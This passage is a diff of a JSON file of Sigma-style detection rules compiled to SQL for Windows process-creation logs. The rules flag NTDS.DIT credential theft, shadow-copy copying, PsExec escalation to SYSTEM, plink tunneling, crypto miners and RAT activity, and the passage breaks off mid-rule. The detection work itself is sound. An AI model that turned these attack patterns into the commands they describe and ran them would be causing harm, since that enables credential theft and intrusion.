"fa00b701-44c6-4679-994d-5a18afa8a707", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], + "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "title": "TAIDOOR RAT DLL Load", + "id": "d1aa3382-abab-446f-96ea-4de52908210b", "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", "author": 
"Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.execution", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_apt_taidoor.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", - "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. 
Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "title": "Remote Access Tool - ScreenConnect Suspicious Execution", + "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "status": "test", + "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ - "Unknown" + "Legitimate use by administrative staff" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Invoke-Obfuscation STDIN+ Launcher", + "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, 
oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug 
Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE 
'%\\\\NTDSDump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\apache%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tomcat%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child 
processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, 
{ - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. 
The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup 
scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% 
--cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + 
"id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine 
LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 
